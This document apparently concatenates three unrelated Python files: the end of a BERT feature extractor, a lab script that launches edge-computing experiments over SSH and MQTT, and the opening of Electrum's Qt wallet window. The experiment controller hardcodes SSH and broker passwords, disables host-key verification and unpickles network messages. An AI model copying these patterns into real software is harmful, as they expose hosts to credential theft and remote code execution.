all_unique_ids.append(feature.unique_id)
all_input_ids.append(feature.input_ids)
all_input_mask.append(feature.input_mask)
all_input_type_ids.append(feature.input_type_ids)
def input_fn(params):
"""The actual input function."""
batch_size = params["batch_size"]
num_examples = len(features)
# This is for demo purposes and does NOT scale to large data sets. We do
# not use Dataset.from_generator() because that uses tf.py_func which is
# not TPU compatible. The right way to load data is with TFRecordReader.
d = tf.data.Dataset.from_tensor_slices({
"unique_ids":
tf.constant(all_unique_ids, shape=[num_examples], dtype=tf.int32),
"input_ids":
tf.constant(
all_input_ids, shape=[num_examples, seq_length],
dtype=tf.int32),
"input_mask":
tf.constant(
all_input_mask,
shape=[num_examples, seq_length],
dtype=tf.int32),
"input_type_ids":
tf.constant(
all_input_type_ids,
shape=[num_examples, seq_length],
dtype=tf.int32),
})
d = d.batch(batch_size=batch_size, drop_remainder=False)
return d
return input_fn
def model_fn_builder(self, bert_config, init_checkpoint, layer_indexes):
"""Returns `model_fn` closure for TPUEstimator."""
def model_fn(features, labels, mode, params): # pylint: disable=unused-argument
"""The `model_fn` for TPUEstimator."""
unique_ids = features["unique_ids"]
input_ids = features["input_ids"]
input_mask = features["input_mask"]
input_type_ids = features["input_type_ids"]
jit_scope = tf.contrib.compiler.jit.experimental_jit_scope
with jit_scope():
model = modeling.BertModel(
config=bert_config,
is_training=False,
input_ids=input_ids,
input_mask=input_mask,
token_type_ids=input_type_ids)
if mode != tf.estimator.ModeKeys.PREDICT:
raise ValueError("Only PREDICT modes are supported: %s" % (mode))
tvars = tf.trainable_variables()
(assignment_map, initialized_variable_names) = modeling.get_assignment_map_from_checkpoint(tvars,
init_checkpoint)
tf.logging.info("**** Trainable Variables ****")
for var in tvars:
init_string = ""
if var.name in initialized_variable_names:
init_string = ", *INIT_FROM_CKPT*"
tf.logging.info(" name = %s, shape = %s%s", var.name, var.shape,
init_string)
all_layers = model.get_all_encoder_layers()
predictions = {
"unique_id": unique_ids,
}
for (i, layer_index) in enumerate(layer_indexes):
predictions["layer_output_%d" % i] = all_layers[layer_index]
from tensorflow.python.estimator.model_fn import EstimatorSpec
output_spec = EstimatorSpec(mode=mode, predictions=predictions)
return output_spec
return model_fn
def convert_examples_to_features(self, seq_length, tokenizer):
"""Loads a data file into a list of `InputBatch`s."""
features = []
input_masks = []
examples = self._to_example(self.input_queue.get())
for (ex_index, example) in enumerate(examples):
tokens_a = tokenizer.tokenize(example.text_a)
# if the sentences's length is more than seq_length, only use sentence's left part
if len(tokens_a) > seq_length - 2:
tokens_a = tokens_a[0:(seq_length - 2)]
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
#
# Where "type_ids" are used to indicate whether this is the first
# sequence or the second sequence. The embedding vectors for `type=0` and
# `type=1` were learned during pre-training and are added to the wordpiece
# embedding vector (and position vector). This is not *strictly* necessary
# since the [SEP] token unambiguously separates the sequences, but it makes
# it easier for the model to learn the concept of sequences.
#
# For classification tasks, the first vector (corresponding to [CLS]) is
# used as as the "sentence vector". Note that this only makes sense because
# the entire model is fine-tuned.
tokens = []
input_type_ids = []
tokens.append("[CLS]")
input_type_ids.append(0)
for token in tokens_a:
tokens.append(token)
input_type_ids.append(0)
tokens.append("[SEP]")
input_type_ids.append(0)
# Where "input_ids" are tokens's index in vocabulary
input_ids = tokenizer.convert_tokens_to_ids(tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
input_mask = [1] * len(input_ids)
input_masks.append(input_mask)
# Zero-pad up to the sequence length.
while len(input_ids) < seq_length:
input_ids.append(0)
input_mask.append(0)
input_type_ids.append(0)
assert len(input_ids) == seq_length
assert len(input_mask) == seq_length
assert len(input_type_ids) == seq_length
if ex_index < 5:
tf.logging.info("*** Example ***")
tf.logging.info("unique_id: %s" % (example.unique_id))
tf.logging.info("tokens: %s" % " ".join(
[tokenization.printable_text(x) for x in tokens]))
tf.logging.info("input_ids: %s" % " ".join([str(x) for x in input_ids]))
tf.logging.info("input_mask: %s" % " ".join([str(x) for x in input_mask]))
tf.logging.info(
"input_type_ids: %s" % " ".join([str(x) for x in input_type_ids]))
yield InputFeatures(
unique_id=example.unique_id,
tokens=tokens,
input_ids=input_ids,
input_mask=input_mask,
input_type_ids=input_type_ids)
def _truncate_seq_pair(self, tokens_a, tokens_b, max_length):
"""Truncates a sequence pair in place to the maximum length."""
# This is a simple heuristic which will always truncate the longer sequence
# one token at a time. This makes more sense than truncating an equal percent
# of tokens from each, since if one sequence is very short then each token
# that's truncated likely contains more information than a longer sequence.
while True:
total_length = len(tokens_a) + len(tokens_b)
if total_length <= max_length:
break
if len(tokens_a) > len(tokens_b):
tokens_a.pop()
else:
tokens_b.pop()
@staticmethod
def _to_example(sentences):
import re
"""
sentences to InputExample
:param sentences: list of strings
:return: list of InputExample
"""
unique_id = 0
for ss in sentences:
line = tokenization.convert_to_unicode(ss)
if not line:
continue
line = line.strip()
text_a = None
text_b = None
m = re.match(r"^(.*) \|\|\| (.*)$", line)
if m is None:
text_a = line
else:
text_a = m.group(1)
text_b = m.group(2)
yield InputExample(unique_id=unique_id, text_a=text_a, text_b=text_b)
unique_id += 1
if __name__ == "__main__":
import time
bert = BertVector()
while True:
question = input('question: ')
start = time.time()
vectors = bert.encode([question])
print(str(vectors))
#print(f'predict time:----------{time.time() - start}')
|
manual_control.py | import pickle
import paho.mqtt.client as mqtt
from threading import Thread
import time
import os
import paramiko
import json
# algorithm imports
mec_nodes = {'mec-9': '192.168.122.119', 'mec-8': '192.168.122.118', 'mec-7': '192.168.122.117',
'mec-6': '192.168.122.116', 'mec-5': '192.168.122.115', 'mec-4': '192.168.122.114',
'mec-3': '192.168.122.113', 'mec-2': '192.168.122.112', 'mec-1': '192.168.122.111',
'osboxes-0': '192.168.122.110'}
class BrokerCom:
def __init__(self, user, pw, ip, sub_topic):
self.user = user
self.pw = pw
self.ip = ip
self.port = 1883
self.topic = sub_topic
self.client = mqtt.Client()
self.finished = set()
self.run = 1
def on_connect(self, connect_client, userdata, flags, rc):
print("Connected with Code :" + str(rc))
# Subscribe Topic from here
connect_client.subscribe(self.topic)
def on_message(self, message_client, userdata, msg):
data = pickle.loads(msg.payload) # [hostname, ip]
print(msg.topic, data)
self.finished.add(data[1])
def publish(self, topic, data):
self.client.publish(topic, data)
def broker_loop(self):
self.client.on_connect = self.on_connect
self.client.on_message = self.on_message
self.client.username_pw_set(self.user, self.pw)
self.client.connect(self.ip, self.port, 60)
self.client.loop_start()
while True:
if self.run == 0:
self.client.loop_stop()
self.client.disconnect()
print('broker loop stopped!')
break
def __del__(self):
print('Broker Communication Object Deleted!')
def mec_id(client_ip):
_id = client_ip.split('.')[-1]
if len(_id) == 1:
return '00' + _id
elif len(_id) == 2:
return '0' + _id
else:
return _id
"""
{'mec-9': '192.168.122.119', 'mec-8': '192.168.122.118', 'mec-7': '192.168.122.117', 'mec-6': '192.168.122.116', 'mec-5': '192.168.122.115', 'mec-4': '192.168.122.114', 'mec-3': '192.168.122.113', 'mec-2': '192.168.122.112', 'mec-1': '192.168.122.111', 'osboxes-0': '192.168.122.110'}
"""
def send_command(host_, no_mec, algo_no, send_path):
try:
c = paramiko.SSHClient()
un = 'mec'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
algos = {1: 'algo_one', 2: 'algo_two', 3: 'algo_three', 4: 'algo_four', 5: 'algo_five', 6: 'algo_six'}
if host_ == mec_nodes['osboxes-0']:
p = '/home/mec/deadlock_project/4algo/manual/gui'
else:
p = '/home/mec/deadlock_project/4algo/manual'
cmd = f"python3 {p}/{algos[algo_no]}.py --n={no_mec} --p={send_path}"
print(cmd)
c.exec_command(cmd)
except Exception as e:
print(e)
def send_client(host_, no_mec, algo_no, send_path):
try:
c = paramiko.SSHClient()
un = 'osboxes'
pw = 'password'
port = 22
c.set_missing_host_key_policy(paramiko.AutoAddPolicy())
c.connect(host_, port, un, pw)
# --n=4 --a=1 --p=homo_1
p = '/home/osboxes/deadlock_project/4algo/manual'
cmd = f"python3 {p}/1client.py --n={no_mec} --a={algo_no} --p={send_path}"
print(cmd)
c.exec_command(cmd)
except Exception as e:
print(e)
# python3 algo_three.py --n=10 --p=homo_4
def exp_control():
global messenger
broker_dict = {'user': 'mec', 'pw': 'password', 'sub_topic': 'control', 'ip': '192.168.122.111'}
algos = [i for i in range(1, 7)]
exp_no = [4, 7, 10]
exp_type = ['homo', 'hetero']
client_ips = ['192.168.122.124', '192.168.122.125', '192.168.122.126']
counter = range(5, 16)
messenger = BrokerCom(**broker_dict)
h1 = Thread(target=messenger.broker_loop)
h1.start()
input('start: ')
s_hosts = sorted({i: mec_nodes[i] for i in mec_nodes if i != 'osboxes-0'})
for count in counter:
for kind in exp_type:
for algo_no in algos:
for mec_no in exp_no:
hosts = {i: mec_nodes[i] for i in s_hosts[:mec_no - 1]}
hosts['osboxes-0'] = mec_nodes['osboxes-0']
# h_list = list(hosts)
send_path = f'{kind}_{count}'
print('initializing Edge nodes')
for hostname, ip in hosts.items():
print(hostname, ip)
send_command(host_=ip, no_mec=len(hosts), algo_no=algo_no, send_path=send_path)
#print(f'send_command(host_={ip}, no_mec={len(hosts)}, algo_no={algo_no}, send_path={send_path})')
time.sleep(20)
print('initializing Client Nodes')
print('\n\n')
for ip in client_ips:
send_client(host_=ip, no_mec=len(hosts), algo_no=algo_no, send_path=send_path)
# print(
# f'send_client(host_={ip}, no_mec={len(hosts)}, algo_no={algo_no}, send_path={send_path})')
t_total = mec_no+3
print(f'Experiment {mec_no} for {kind} has commenced!')
while len(messenger.finished) != t_total:
time.sleep(60)
print('All is finished!')
messenger.finished = set()
time.sleep(3 * 60)
print(f'Experiment {mec_no} for {kind} is concluded!')
print('Waiting for 60 seconds Time Lapse!')
print('\n\n\n\n\n\n')
time.sleep(60)
print('All Experiments has been Concluded!')
if __name__ == '__main__':
os.system('clear')
try:
exp_control()
except KeyboardInterrupt:
print('killed')
messenger.run = 0
|
main_window.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING, Sequence, List, Union
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtCore import QTimer
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QSizePolicy, QStatusBar, QToolTip, QDialog,
QMenu, QAction, QStackedWidget, QToolButton)
import electrum
from electrum import (keystore, ecc, constants, util, bitcoin, commands,
paymentrequest, lnutil)
from electrum.bitcoin import COIN, is_address
from electrum.plugin import run_hook, BasePlugin
from electrum.i18n import _
from electrum.util import (format_time,
UserCancelled, profiler,
bh2u, bfh, InvalidPassword,
UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, maybe_extract_bolt11_invoice, NotEnoughFunds,
NoDynamicFeeEstimates, MultipleSpendMaxTxOutputs,
AddTransactionException, BITCOIN_BIP21_URI_SCHEME)
from electrum.invoices import PR_TYPE_ONCHAIN, PR_TYPE_LN, PR_DEFAULT_EXPIRATION_WHEN_CREATING, Invoice
from electrum.invoices import PR_PAID, PR_FAILED, pr_expiration_values, LNInvoice, OnchainInvoice
from electrum.transaction import (Transaction, PartialTxInput,
PartialTransaction, PartialTxOutput)
from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption,
CannotDoubleSpendTx, CannotCPFP)
from electrum.version import ELECTRUM_VERSION
from electrum.network import (Network, TxBroadcastError, BestEffortRequestFailed,
UntrustedServerReturnedError, NetworkException)
from electrum.exchange_rate import FxThread
from electrum.simple_config import SimpleConfig
from electrum.logging import Logger
from electrum.lnutil import ln_dummy_address, extract_nodeid, ConnStringFormatError
from electrum.lnaddr import lndecode, LnDecodeException
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, FreezableLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider, FeeComboBox
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
TRANSACTION_FILE_EXTENSION_FILTER_ANY, MONOSPACE_FONT,
getOpenFileName, getSaveFileName, BlockingWaitingDialog)
from .util import ButtonsTextEdit, ButtonsLineEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
from .confirm_tx_dialog import ConfirmTxDialog
from .transaction_dialog import PreviewTxDialog
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QToolButton):
# note: this class has a custom stylesheet applied in stylesheet_patcher.py
def __init__(self, icon, tooltip, func):
QToolButton.__init__(self)
self.setText('')
self.setIcon(icon)
self.setToolTip(tooltip)
self.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
self.setAutoRaise(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() in [ Qt.Key_Return, Qt.Key_Enter ]:
self.func()
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
show_error_signal = pyqtSignal(str)
payment_request: Optional[paymentrequest.PaymentRequest]
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
assert wallet, "no wallet"
self.wallet = wallet
if wallet.has_lightning():
self.wallet.config.set_key('show_channels_tab', True)
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.pluginsdialog = None
self.showing_cert_mismatch_error = False
self.tl_windows = []
self.pending_invoice = None
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.completions = QStringListModel()
coincontrol_sb = self.create_coincontrol_statusbar()
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
self.channels_tab = self.create_channels_tab()
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
central_widget = QWidget()
vbox = QVBoxLayout(central_widget)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(tabs)
vbox.addWidget(coincontrol_sb)
self.setCentralWidget(central_widget)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.show_error_signal.connect(self.show_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'payment_failed', 'payment_succeeded',
'invoice_status', 'request_status', 'ln_gossip_sync_progress',
'cert_mismatch', 'gossip_db_loaded']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
util.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
#self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread()
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook.maybe_setup(config=self.config,
wallet=self.wallet)
def run_coroutine_from_thread(self, coro, on_result=None):
def task():
try:
f = asyncio.run_coroutine_threadsafe(coro, self.network.asyncio_loop)
r = f.result()
if on_result:
on_result(r)
except Exception as e:
self.logger.exception("exception in coro scheduled via window.wallet")
self.show_error_signal.emit(str(e))
self.wallet.thread.add(task)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
# TODO would be nice if we just sent these to the crash reporter...
# anything we don't want to send there, we should explicitly catch
# send_exception_to_crash_reporter(e)
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
# note: all windows get events from all wallets!
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
elif event == 'gossip_db_loaded':
self.channels_list.gossip_db_loaded.emit(*args)
elif event == 'channels_updated':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_rows.emit(*args)
elif event == 'channel':
wallet = args[0]
if wallet == self.wallet:
self.channels_list.update_single_row.emit(*args)
self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'payment_succeeded':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_succeeded(*args)
elif event == 'payment_failed':
wallet = args[0]
if wallet == self.wallet:
self.on_payment_failed(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
pass
elif event == 'fee_histogram':
self.history_model.on_fee_histogram()
elif event == 'ln_gossip_sync_progress':
self.update_lightning_icon()
elif event == 'cert_mismatch':
self.show_cert_mismatch_error()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
self.wallet.thread = None
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet: Abstract_Wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.has_lightning():
util.trigger_callback('channels_updated', wallet)
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.db.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum Testnet" if constants.net.TESTNET else "Electrum"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.db.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def select_backup_dir(self, b):
name = self.config.get('backup_dir', '')
dirname = QFileDialog.getExistingDirectory(self, "Select your wallet backup directory", name)
if dirname:
self.config.set_key('backup_dir', dirname)
self.backup_dir_e.setText(dirname)
def backup_wallet(self):
d = WindowModalDialog(self, _("File Backup"))
vbox = QVBoxLayout(d)
grid = QGridLayout()
backup_help = ""
backup_dir = self.config.get('backup_dir')
backup_dir_label = HelpLabel(_('Backup directory') + ':', backup_help)
msg = _('Please select a backup directory')
if self.wallet.has_lightning() and self.wallet.lnworker.channels:
msg += '\n\n' + ' '.join([
_("Note that lightning channels will be converted to channel backups."),
_("You cannot use channel backups to perform lightning payments."),
_("Channel backups can only be used to request your channels to be closed.")
])
self.backup_dir_e = QPushButton(backup_dir)
self.backup_dir_e.clicked.connect(self.select_backup_dir)
grid.addWidget(backup_dir_label, 1, 0)
grid.addWidget(self.backup_dir_e, 1, 1)
vbox.addLayout(grid)
vbox.addWidget(WWLabel(msg))
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
